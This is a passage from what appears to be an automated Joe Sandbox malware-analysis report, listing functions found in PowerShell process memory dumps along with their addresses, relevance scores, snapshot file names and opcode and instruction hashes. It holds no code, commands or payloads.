                                                                                                                                • Opcode Fuzzy Hash: a90d608df8d4d6ded824fe90a99eacc3e389afd2d7cce83ba3d969ac0a09378a
                                                                                                                                • Instruction Fuzzy Hash: 2A113A21A0FAC90FE7A2E7688CA9865BBD1DF5631075D01FAC098CB2F3E908AC45C341
                                                                                                                                Function 00007FFD9B834EB1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 25e20daacc1a8b9fcea8b40ef93959f41e93aacfcbd1294e8823d0cae9115326
                                                                                                                                • Instruction ID: 3bd8779eb9b3799293d8cf399a45fd0f03e31ed18f88e499e0adb5acb620e434
                                                                                                                                • Opcode Fuzzy Hash: 25e20daacc1a8b9fcea8b40ef93959f41e93aacfcbd1294e8823d0cae9115326
                                                                                                                                • Instruction Fuzzy Hash: 8601D622F1FA9D0BEBB5A7682C255B865C1EF5C720B4E05FAE81CD32EBDD086D044281
                                                                                                                                Function 00007FFD9B763535 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1869607605.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b760000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                                                                                                                • Instruction ID: 662e280c937e7ea4aa8bdaf3df67460d56bef4c90e85a80d25cee34920001367
                                                                                                                                • Opcode Fuzzy Hash: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                                                                                                                • Instruction Fuzzy Hash: 3C01677121CB0C8FDB48EF0CE451AA5B7E0FB95364F10056DE58AC36A6DB36E881CB46
                                                                                                                                Function 00007FFD9B8380AA Relevance: .0, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 317a0b0e759f5379e8f3a0ae7cd513c8e4e9e05eb707cab656943bf1b31298fb
                                                                                                                                • Instruction ID: 59e6b4fb9b5971de6e5b3c77fd00067de2ce84e09b14ea2a396b0e57134bd14f
                                                                                                                                • Opcode Fuzzy Hash: 317a0b0e759f5379e8f3a0ae7cd513c8e4e9e05eb707cab656943bf1b31298fb
                                                                                                                                • Instruction Fuzzy Hash: E6E02233B5AD0D0EE795A76C54245F9B3D2EFC8132B5A42B3D51EC32A6ED21D80B4380
                                                                                                                                Function 00007FFD9B83122A Relevance: .0, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0b0097d432e837163f7c23227cc9c09e96ea0dc4fbc8a4339724bb2c560d0d15
                                                                                                                                • Instruction ID: 4abe4f7fd8a30278a95a40f07ecef6fce00fbbfeaf5d8980056c57d8f2091f33
                                                                                                                                • Opcode Fuzzy Hash: 0b0097d432e837163f7c23227cc9c09e96ea0dc4fbc8a4339724bb2c560d0d15
                                                                                                                                • Instruction Fuzzy Hash: EDE0D853F0FA8A4FEB94B73C18690A866D1EFE965071504BBD04CC71EFDD185D094341
                                                                                                                                Function 00007FFD9B838469 Relevance: .0, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ed671fcf9fb144760f466dec3b41aa36b50a4b6e9303f694fc71d970a2a4f17d
                                                                                                                                • Instruction ID: deeeb15df3cafbc295aa5b217489f0f1d26f3554715e589fb850ccbe4c7d6a45
                                                                                                                                • Opcode Fuzzy Hash: ed671fcf9fb144760f466dec3b41aa36b50a4b6e9303f694fc71d970a2a4f17d
                                                                                                                                • Instruction Fuzzy Hash: EEE02633F1EA0D0EFB9C6A5C28210F8B3C1EF85120B98047FD15EC2597EC1AA8124381

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00007FFD9B836BD8 Relevance: 2.4, Strings: 1, Instructions: 1174COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: H
                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                • Opcode ID: 41e9eb98f50bb186acbbb0af0821a1dde5971f03daf3e1bf6c0724031999385b
                                                                                                                                • Instruction ID: 4a021e8936f10a4ffb8a4f7b9c81792a5f6bacc9d7c198159675e928eb27c92f
                                                                                                                                • Opcode Fuzzy Hash: 41e9eb98f50bb186acbbb0af0821a1dde5971f03daf3e1bf6c0724031999385b
                                                                                                                                • Instruction Fuzzy Hash: F8920872A0EA894FDBA9DF6884649687BE1EF59304F1900FDD05DCB2E3DA29EC45C740

                                                                                                                                Executed Functions

                                                                                                                                Function 04E3E928 Relevance: .3, Instructions: 281COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7cad61906a5475ebc6e9b361d14c1b6c9991ae84ebe45d1609f557d5b8555e76
                                                                                                                                • Instruction ID: 332ee1fe46b774b5621aaae63eaec62eaed24af6571dec5d30d880b06c505873
                                                                                                                                • Opcode Fuzzy Hash: 7cad61906a5475ebc6e9b361d14c1b6c9991ae84ebe45d1609f557d5b8555e76
                                                                                                                                • Instruction Fuzzy Hash: D4B14C70E00249CFDF11CFADC88979EBBF2BF88709F149529D855A7254EB34A845CB81
                                                                                                                                Function 04E3F1F8 Relevance: .3, Instructions: 266COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c5b0cca038711c478a9659152ce7bee8be44f91a099f6ad73a4867e4cd782d5b
                                                                                                                                • Instruction ID: f04a6a497aca85efef47dc87ba97a63e646f4fa407c1b0befd5563741bc9dc18
                                                                                                                                • Opcode Fuzzy Hash: c5b0cca038711c478a9659152ce7bee8be44f91a099f6ad73a4867e4cd782d5b
                                                                                                                                • Instruction Fuzzy Hash: 08B1A370E00209DFDF11CFA9D8897EDBBF2AF88319F149529D819E7254EB34A845CB81
                                                                                                                                Function 04E39219 Relevance: .1, Instructions: 118COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dd8e4abcce4e4959e69c50ad688563dcedaccc321c4ec8059e4b880159df419a
                                                                                                                                • Instruction ID: 80af35764e83cfd079e60224f6b7c3f900c8e1075d52b06e0df6f8b3d18a5337
                                                                                                                                • Opcode Fuzzy Hash: dd8e4abcce4e4959e69c50ad688563dcedaccc321c4ec8059e4b880159df419a
                                                                                                                                • Instruction Fuzzy Hash: 73419B70600200DFDB19DF64D998AAEBBF6EF89301F095068E406EB7A5CB75AC44CB50
                                                                                                                                Function 07D05C20 Relevance: 10.6, Strings: 8, Instructions: 577COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                • API String ID: 0-3166488486
                                                                                                                                • Opcode ID: 6e73867429bb282dfb1090134280b734995a105c8d8f9a65deca20e4d52c376b
                                                                                                                                • Instruction ID: 50a5dff1673a317bceb7612ccff810cbf56bf34a4c2c6d282f8847c840ab835f
                                                                                                                                • Opcode Fuzzy Hash: 6e73867429bb282dfb1090134280b734995a105c8d8f9a65deca20e4d52c376b
                                                                                                                                • Instruction Fuzzy Hash: 3932B4B4A00219DFDB24CB68C954F9AFBB2BB45304F1490AAD509AF395CB31DC91CF91
                                                                                                                                Function 07D07561 Relevance: 7.8, Strings: 6, Instructions: 289COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                • API String ID: 0-2822668367
                                                                                                                                • Opcode ID: 0123ac86db79ad19ce1f0c2899b208cee0e16878b4d2bb0abae874ca9e8e69a5
                                                                                                                                • Instruction ID: 70dfe9df4b5b081e93d1dfd21be1f9c4f28fc18fd94b409368e9a3a5c36ab35c
                                                                                                                                • Opcode Fuzzy Hash: 0123ac86db79ad19ce1f0c2899b208cee0e16878b4d2bb0abae874ca9e8e69a5
                                                                                                                                • Instruction Fuzzy Hash: 0FB1D1B0B00209DFCB18DB68C955B5EFBA2AB84358F10D469D4026F795CB76EC85CBD1
                                                                                                                                Function 04E3AE30 Relevance: 4.3, Strings: 3, Instructions: 519COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Hbq$$^q$$^q
                                                                                                                                • API String ID: 0-1611274095
                                                                                                                                • Opcode ID: 19d2a64b1aa1c7004193d39d97d7a6e325c219be8424fef4782c09479dd3f585
                                                                                                                                • Instruction ID: 8cfd4c79eb4c489a5e228e72f956e1beb0779ff8fd08652e62aadd1635a90e9d
                                                                                                                                • Opcode Fuzzy Hash: 19d2a64b1aa1c7004193d39d97d7a6e325c219be8424fef4782c09479dd3f585
                                                                                                                                • Instruction Fuzzy Hash: 71226034B002149FDB26EF25D8547AEBBB2AF89305F1540A9D50AAB361DF35ED85CF80
                                                                                                                                Function 07D074A2 Relevance: 4.0, Strings: 3, Instructions: 279COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$4'^q
                                                                                                                                • API String ID: 0-1196845430
                                                                                                                                • Opcode ID: 43b961f81e4df684383070d1c2fc58c73429fd14e5d15bf9036f95c9704dcbbb
                                                                                                                                • Instruction ID: 5dad828e01e1d5705566ec2ec2b0e74d137817b273ef0669f795ff7620a7182e
                                                                                                                                • Opcode Fuzzy Hash: 43b961f81e4df684383070d1c2fc58c73429fd14e5d15bf9036f95c9704dcbbb
                                                                                                                                • Instruction Fuzzy Hash: D7B1DCB0A00209DFCB14CB68C945B9AFBB2AB88328F15D069D4016F395CB75EC86CBD1
                                                                                                                                Function 07D004C8 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $^q$$^q$$^q
                                                                                                                                • API String ID: 0-831282457
                                                                                                                                • Opcode ID: 78bd41a7892330cc2d50786e29d3eeb1ad046717eb070f21cc1596d0a65bfefd
                                                                                                                                • Instruction ID: 6595e2beda9923d08b446b603ca28f744c3774952cc13a11d593e1d6bec10dd9
                                                                                                                                • Opcode Fuzzy Hash: 78bd41a7892330cc2d50786e29d3eeb1ad046717eb070f21cc1596d0a65bfefd
                                                                                                                                • Instruction Fuzzy Hash: 8E413AF6F0021AAFCB249E69984477EFBE5AFC5610B14942AD805EB384DF31D905C7E1
                                                                                                                                Function 07D00B90 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $^q$$^q$$^q
                                                                                                                                • API String ID: 0-831282457
                                                                                                                                • Opcode ID: 12daa4996a53534a65a61987d8f73f6d3a3d95ff2b8d99136c07dafae3ab5559
                                                                                                                                • Instruction ID: 552aff25a1cadb6d59a2a5168f6b5cd722e8ad076cd518a5ab611c4a89ba44e3
                                                                                                                                • Opcode Fuzzy Hash: 12daa4996a53534a65a61987d8f73f6d3a3d95ff2b8d99136c07dafae3ab5559
                                                                                                                                • Instruction Fuzzy Hash: 26216BB17103067BD738596A4804B37EADA9BC1719F24943AA509CB3C5CD76C884C3A1
                                                                                                                                Function 07D03990 Relevance: 3.2, Strings: 2, Instructions: 693COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: tP^q$tP^q
                                                                                                                                • API String ID: 0-309238000
                                                                                                                                • Opcode ID: dd3cedf9f9d9f47c7b2ebd135f9ee3163cbf8e1d3012cbf2c8c423f0e7de54f8
                                                                                                                                • Instruction ID: a2eb5a167c6f389947cc0620530018239634fad15a3aec05df2a78bf7b3327c1
                                                                                                                                • Opcode Fuzzy Hash: dd3cedf9f9d9f47c7b2ebd135f9ee3163cbf8e1d3012cbf2c8c423f0e7de54f8
                                                                                                                                • Instruction Fuzzy Hash: 00526DB4B00209AFD714CB98C955F9AFBB2AF85304F14D069E905AF395CB76EC81CB91
                                                                                                                                Function 07D063F3 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                • Opcode ID: 098aef280841087358c213de88afdb9215c42d5940bf58d93192da877d34fc00
                                                                                                                                • Instruction ID: 1d8364aaefd7be3fcad03509e26449bb6b9339a705c7981b6f8ba0fff6f8992a
                                                                                                                                • Opcode Fuzzy Hash: 098aef280841087358c213de88afdb9215c42d5940bf58d93192da877d34fc00
                                                                                                                                • Instruction Fuzzy Hash: 96F1EFB4A00219DFDB28DB68CD51FAEBBB2AF85304F1084E9D5096F795CB71DC818B91
                                                                                                                                Function 07D010F8 Relevance: 2.9, Strings: 2, Instructions: 388COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                • Opcode ID: 2799326a1d9694508360de381ffa63089a4b231f7f5f65b923242a3cd9fb6bc8
                                                                                                                                • Instruction ID: 8f45998c87829162da89f0a9c7b87b8e0b6487b99a98bcc9e908a61af0bfd0dc
                                                                                                                                • Opcode Fuzzy Hash: 2799326a1d9694508360de381ffa63089a4b231f7f5f65b923242a3cd9fb6bc8
                                                                                                                                • Instruction Fuzzy Hash: 8AF15CB4B00209DFDB14CB98C951B6EFBB2BB89304F14D069D905AF795DB32EC418B91
                                                                                                                                Function 07D00B76 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $^q$$^q
                                                                                                                                • API String ID: 0-355816377
                                                                                                                                • Opcode ID: 6a36adb05493491e67660e6d08a3888ae06feca47d518df206e4c99b6e55c307
                                                                                                                                • Instruction ID: 9b5d0e3db5d12081a1f28498ed307d0ec8d957861653c9ee864c7439f64598dc
                                                                                                                                • Opcode Fuzzy Hash: 6a36adb05493491e67660e6d08a3888ae06feca47d518df206e4c99b6e55c307
                                                                                                                                • Instruction Fuzzy Hash: 0B212BF12083867BD7354A364811B77FFA55B82619F18946BD944CF2D2C97AC888C3B2
                                                                                                                                Function 07D01501 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: h2k
                                                                                                                                • API String ID: 0-4087034519
                                                                                                                                • Opcode ID: 606f93d1af5dfbad6c98e5b6901384a8fa0c6bc0a9d79f78c92b070891bcfdd8
                                                                                                                                • Instruction ID: 50a4375d4afaae590e6548e8374b06a452b46484a29fa0d18dc45138db775f31
                                                                                                                                • Opcode Fuzzy Hash: 606f93d1af5dfbad6c98e5b6901384a8fa0c6bc0a9d79f78c92b070891bcfdd8
                                                                                                                                • Instruction Fuzzy Hash: 7D51B1B4B00209EFDB24CA98C851B6EFBB2EB85309F189169E9459F391D633DD41CB91
                                                                                                                                Function 07D02DD6 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: tP^q
                                                                                                                                • API String ID: 0-2862610199
                                                                                                                                • Opcode ID: 1e7185662e2aa1249cf309c1c3223a74a8159c55c99b396d545fe389b0594f11
                                                                                                                                • Instruction ID: 808c6fe9e68aeb34ff4d26d25e7fc7f8967db1474ac2aabd41f7cb6cdd350b1a
                                                                                                                                • Opcode Fuzzy Hash: 1e7185662e2aa1249cf309c1c3223a74a8159c55c99b396d545fe389b0594f11
                                                                                                                                • Instruction Fuzzy Hash: CC1188B16092901FC30A9B68D8255A5FFB4EF86224B1C88CBE488CF2D3C4258C0AC7E1
                                                                                                                                Function 07D03AB4 Relevance: .5, Instructions: 534COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4b9b11d6bdc52a45aa4eeb280b12837cde0f8a5bba97fcbc6bbbfefc79a04711
                                                                                                                                • Instruction ID: e41daad41aae9130b57b68e3b193e66eaae397e6a98108bd4f7dfbae18cb591b
                                                                                                                                • Opcode Fuzzy Hash: 4b9b11d6bdc52a45aa4eeb280b12837cde0f8a5bba97fcbc6bbbfefc79a04711
                                                                                                                                • Instruction Fuzzy Hash: 7B225AB4B01209AFD704CB98C855F99FBB2BF85308F14D159E905AB391CB76EC81CB91
                                                                                                                                Function 07D010F5 Relevance: .3, Instructions: 339COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5beb3349f52d786c12caec8f3e99f4ceabbe82c154b2b920913c7bdab463cfe6
                                                                                                                                • Instruction ID: 576e30157a2c1f776f6339192ade57af04ddec9faf52a1e05bb902b57aa2b789
                                                                                                                                • Opcode Fuzzy Hash: 5beb3349f52d786c12caec8f3e99f4ceabbe82c154b2b920913c7bdab463cfe6
                                                                                                                                • Instruction Fuzzy Hash: 6AD139B4B00209DFDB14CB98C951BAEFBB2FB89714F14D169D909AB391D732EC418B91
                                                                                                                                Function 04E38CC0 Relevance: .3, Instructions: 318COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5c6888a313b0993fe713d9a097ab1b13e3802ec14008c01a3013a08712483cf4
                                                                                                                                • Instruction ID: 411b46cf406f862eb12a3ec3f50053d699b39e9de4b5c48ecc00dc947a849c06
                                                                                                                                • Opcode Fuzzy Hash: 5c6888a313b0993fe713d9a097ab1b13e3802ec14008c01a3013a08712483cf4
                                                                                                                                • Instruction Fuzzy Hash: 66C18C31A00248DFDB15EFA5C988A9DBBF2FF85309F158159E406AF265CB74EC49CB80
                                                                                                                                Function 04E3E91D Relevance: .3, Instructions: 277COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 474250f16bccf3b093e758e57ff0144b2acb8b273efdb3075cf7362f2baaf420
                                                                                                                                • Instruction ID: f313dbd3c29cda84ec522023bc9b13a1d2c206f00a59e0147d3981abff1129d0
                                                                                                                                • Opcode Fuzzy Hash: 474250f16bccf3b093e758e57ff0144b2acb8b273efdb3075cf7362f2baaf420
                                                                                                                                • Instruction Fuzzy Hash: BEB15B70E002498FDB12CFADC8897DDBBF1BF88709F149169E855A7254EB34A845CF91
                                                                                                                                Function 07D055D8 Relevance: .3, Instructions: 275COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e35c6ce9f9e1f4a46d9c2a17a8212939154479561433e1bcfddb442fd008fc30
                                                                                                                                • Instruction ID: fb2cfe6032afc702c57fff18cf02d4d749a313e7af3b10b2c0a6553d24e0d8ab
                                                                                                                                • Opcode Fuzzy Hash: e35c6ce9f9e1f4a46d9c2a17a8212939154479561433e1bcfddb442fd008fc30
                                                                                                                                • Instruction Fuzzy Hash: 9AB1DFB4A00209EFD714DB69D545F6EBBF2AB88318F109069D9426F795CB32EC50CFA1
                                                                                                                                Function 04E3F1EE Relevance: .3, Instructions: 262COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2021405126.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f8a6c4fafd55fbd1a0204dd87adb5e773fa00e5e873dd62df08db71d25908c30
                                                                                                                                • Instruction ID: dcc0115706730c4d24da2d52a599a9b161412d63387245da93cd1f28bf244458
                                                                                                                                • Opcode Fuzzy Hash: f8a6c4fafd55fbd1a0204dd87adb5e773fa00e5e873dd62df08db71d25908c30
                                                                                                                                • Instruction Fuzzy Hash: 3CB17F70E00209DFDF11CFA8D8897EDBBF1AF48319F149129E819E7254EB74A845CB81
